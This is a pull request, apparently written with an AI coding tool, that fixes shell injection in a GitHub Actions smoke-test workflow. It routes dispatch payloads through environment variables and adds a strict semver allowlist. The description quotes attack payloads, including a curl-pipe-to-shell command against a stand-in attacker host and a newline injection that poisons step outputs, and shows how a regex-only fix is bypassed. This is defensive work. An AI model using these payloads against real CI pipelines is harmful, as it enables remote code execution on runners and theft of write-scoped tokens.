### PR TITLE
fix(ci): stop shell injection via repository_dispatch payload in sdk-smoke (#206)

### DIFF
--- a/.github/workflows/sdk-smoke.yml
+++ b/.github/workflows/sdk-smoke.yml
@@ -56,15 +56,34 @@ jobs:
 
       # Resolve the version to test: repository_dispatch payload > workflow_dispatch
       # input > pinned default.
+      # Attacker-controlled data (client_payload / inputs) is passed through `env:`
+      # and never interpolated into the shell with `${{ }}`, which GitHub expands
+      # *before* the shell parses the line — quoting does not contain it (#206).
+      # The semver allowlist is the actual boundary: anything carrying shell
+      # metacharacters fails the gate before it can reach `pnpm add`.
       - name: Resolve SDK version
         id: sdk_ver
+        env:
+          PAYLOAD_VERSION: ${{ github.event.client_payload.version }}
+          INPUT_VERSION: ${{ inputs.sdk_version }}
+          DEFAULT_VERSION: ${{ env.SDK_VERSION }}
         run: |
-          VERSION="${{ github.event.client_payload.version }}"
-          if [ -z "$VERSION" ]; then
-            VERSION="${{ inputs.sdk_version }}"
-          fi
-          if [ -z "$VERSION" ]; then
-            VERSION="${{ env.SDK_VERSION }}"
+          VERSION="${PAYLOAD_VERSION:-${INPUT_VERSION:-$DEFAULT_VERSION}}"
+          # `grep -E` is line-oriented, so an anchored ^...$ regex alone is NOT
+          # sufficient: a value like $'1.0.0\ntouch /tmp/pwned' satisfies the
+          # pattern on its first line while smuggling a second line into
+          # $GITHUB_OUTPUT, which GitHub then parses as an extra step output.
+          # `case` matches the WHOLE string (newlines included), so reject any
+          # character outside the semver alphabet before the shape check.
+          case "$VERSION" in
+            ""|*[!0-9A-Za-z.-]*)
+              echo "Refusing to smoke-test a non-semver SDK version: $VERSION"
+              exit 1
+              ;;
+          esac
+          if ! printf '%s' "$VERSION" | grep -qE '^[0-9]+\.[0-9]+\.[0-9]+(-[A-Za-z0-9.]+)?$'; then
+            echo "Refusing to smoke-test a non-semver SDK version: $VERSION"
+            exit 1
           fi
           echo "version=$VERSION" >> "$GITHUB_OUTPUT"
           echo "Testing @percolatorct/sdk@$VERSION"
@@ -77,16 +96,20 @@ jobs:
         run: pnpm install --frozen-lockfile
 
       - name: Override SDK dep with published npm version
+        env:
+          SDK_VER: ${{ steps.sdk_ver.outputs.version }}
         run: |
-          pnpm add "@percolatorct/sdk@${{ steps.sdk_ver.outputs.version }}" \
+          pnpm add "@percolatorct/sdk@${SDK_VER}" \
             --no-frozen-lockfile
 
       - name: Verify installed SDK version
+        env:
+          SDK_VER: ${{ steps.sdk_ver.outputs.version }}
         run: |
           INSTALLED=$(node -e "console.log(require('./node_modules/@percolatorct/sdk/package.json').version)")
           echo "Installed: $INSTALLED"
-          if [ "$INSTALLED" != "${{ steps.sdk_ver.outputs.version }}" ]; then
-            echo "Version mismatch: expected ${{ steps.sdk_ver.outputs.version }}, got $INSTALLED"
+          if [ "$INSTALLED" != "$SDK_VER" ]; then
+            echo "Version mismatch: expected $SDK_VER, got $INSTALLED"
             exit 1
           fi
 
@@ -95,10 +118,13 @@ jobs:
 
       - name: Report result
         if: always()
+        env:
+          SDK_VER: ${{ steps.sdk_ver.outputs.version }}
+          JOB_STATUS: ${{ job.status }}
         run: |
-          if [ "${{ job.status }}" = "success" ]; then
-            echo "@percolatorct/sdk@${{ steps.sdk_ver.outputs.version }} smoke PASSED"
+          if [ "$JOB_STATUS" = "success" ]; then
+            echo "@percolatorct/sdk@${SDK_VER} smoke PASSED"
           else
-            echo "@percolatorct/sdk@${{ steps.sdk_ver.outputs.version }} smoke FAILED"
+            echo "@percolatorct/sdk@${SDK_VER} smoke FAILED"
             exit 1
           fi


### PR DESCRIPTION
Fixes #206.

## What

`.github/workflows/sdk-smoke.yml` interpolated event-controlled data directly into `run:` blocks. GitHub Actions expands `${{ }}` **before** the shell parses the line, so the surrounding quotes never contain the injected string:

```yaml
VERSION="${{ github.event.client_payload.version }}"
```

A dispatch payload of `1.0.0"; curl https://attacker/x | sh; echo "` executes arbitrary commands on the runner with the job's write-scoped `GITHUB_TOKEN`. The tainted value flowed onward into `pnpm add`, the verify step and the report step — **four injection points**.

This is the cross-repo seam the SDK post-publish workflow drives via `gh api .../dispatches`, so a compromised SDK pipeline or a leaked PAT pivots straight into this runner.

## Fix

All event-controlled data now moves through `env:`, so it is never expanded into script text, plus a semver allowlist gate.

## ⚠️ The fix proposed in the issue is bypassable — hardened further

#206 suggests gating with an anchored `grep -qE '^[0-9]+\.[0-9]+\.[0-9]+(-[A-Za-z0-9.]+)?$'`. **That alone is not sufficient, and I confirmed the bypass before hardening.** `grep` is line-oriented, so:

```
1.0.0
touch /tmp/pwned
```

matches the pattern on its *first* line and passes the gate. The multi-line value then hits:

```sh
echo "version=$VERSION" >> "$GITHUB_OUTPUT"
```

writing an extra raw line into `$GITHUB_OUTPUT`, which GitHub parses as an **additional step output** — step-output poisoning that survives into every downstream step.

Measured against the issue's exact suggested regex:

| case | issue's regex | this PR |
|---|---|---|
| `1.0.0\ntouch /tmp/pwned` | **exit 0 — passes** ❌ | exit 1 ✅ |

Hardened by running a `case` guard first, which matches the **whole** string (newlines included) and rejects any character outside the semver alphabet:

```sh
case "$VERSION" in
  ""|*[!0-9A-Za-z.-]*) echo "Refusing ..."; exit 1 ;;
esac
```

## How to test

The step script was extracted **straight out of the shipped YAML** (not retyped) and run against every vector. Attack cases must exit 1 *and* write nothing to `$GITHUB_OUTPUT`:

| case | exit | `$GITHUB_OUTPUT` lines |
|---|---|---|
| issue PoC `1.0.0"; touch /tmp/pwned; echo "` | 1 ✅ | 0 |
| `curl \| sh` RCE | 1 ✅ | 0 |
| backtick subshell | 1 ✅ | 0 |
| `$( )` subshell | 1 ✅ | 0 |
| via `workflow_dispatch` input | 1 ✅ | 0 |
| **newline injection** (prior bypass) | 1 ✅ | 0 |
| **newline + `version=evil` output poisoning** | 1 ✅ | 0 |
| leading/trailing whitespace | 1 ✅ | 0 |
| `1.0.0-beta.33` / `2.0.9` / `3.0.0` | 0 ✅ | 1 |
| no payload → pinned default | 0 ✅ | 1 |

`/tmp/pwned` was never created. A YAML-parser check also confirms **no `${{ }}` remains inside any `run:` block** in the file. Actions stay pinned by full commit SHA.

## Note: this workflow is also failing nightly for an unrelated reason

`SDK publish smoke` has failed every night (exit 254) — but at the `pnpm install --frozen-lockfile` step, which hits the **same missing-sibling-SDK ENOENT as #232**. That is not addressed here, deliberately: this PR is a self-contained security fix and I did not want to mix a CI-plumbing change into it. So this workflow will keep failing nightly until #233 lands and the same sibling checkout is applied here. Worth a follow-up — flagging rather than silently bundling.

🤖 Generated with [Claude Code](https://claude.com/claude-code)